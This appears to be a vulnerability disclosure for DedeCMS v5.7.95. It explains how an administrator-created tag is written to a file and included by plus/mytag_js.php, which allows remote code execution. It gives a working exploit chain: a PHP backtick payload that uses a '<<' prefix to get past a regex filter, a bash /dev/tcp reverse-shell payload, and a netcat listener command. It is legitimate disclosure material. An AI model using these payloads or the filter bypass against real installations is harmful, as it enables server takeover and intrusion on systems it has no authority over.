Dedecms official website:https://www.dedecms.com/download。
There is an arbitrary command execution vulnerability in the background of dedecms v5.7.95, which can write malicious code and cause rce vulnerability.
DedeCMS v5.7.95
First visit /dede to log in to the background.
Visit dede/mytag_ main.php, inserts a tag.
The main contents are as follows:
<<?=`ls`;?>The backquote(`) is actually the alias of the shell_exec function:
Click "OK" to get the corresponding number, which is marked as 3 this time. Visit /plus/mytag_js.php?arcID=3&nocache=1, where arcID=3 is the tag number. After that, the file a will be generated and directly included.
Further use to reverse shell:
<<?=`bash -i &>/dev/tcp/127.0.0.1/2333 <&1`;?>
use ncat:
nc -lvvp 2333Visit /plus/mytag_js.php?arcID=3&nocache=1 to reverse the shell successfully:
Vulnerability location is in plus/mytag_js.php, you can see that the file contains directly after the file is written. In this case, we don't have to care about the file name. Here, the file name has a fixed htm suffix. We need to care about what the myvalues content is when the file is written.
The value of myvalues is found through query. The query statements are:
SELECT * FROM `#@__mytag` WHERE aid='$aid' 
You can search globally to get the information in mytag_add.php or mytag_edit.php. These two files involve the insertion or update of tables.
So visit mytag_main.php, here are add and edit operations
a lot of malicious functions are filtered in plus/mytag_js.php, but the backquotes(`) are not filtered, and they cannot match [^<]+<\?(php|=):
// will be matched
abcde<?php `ls`;?>
<?=`ls`;?>
// will not be matched
<<?=`ls`?>Use << to bypass [^<]+<\?(php|=), thus rce succeeds.
See the "Recurrence process" above for specific operation and utilization.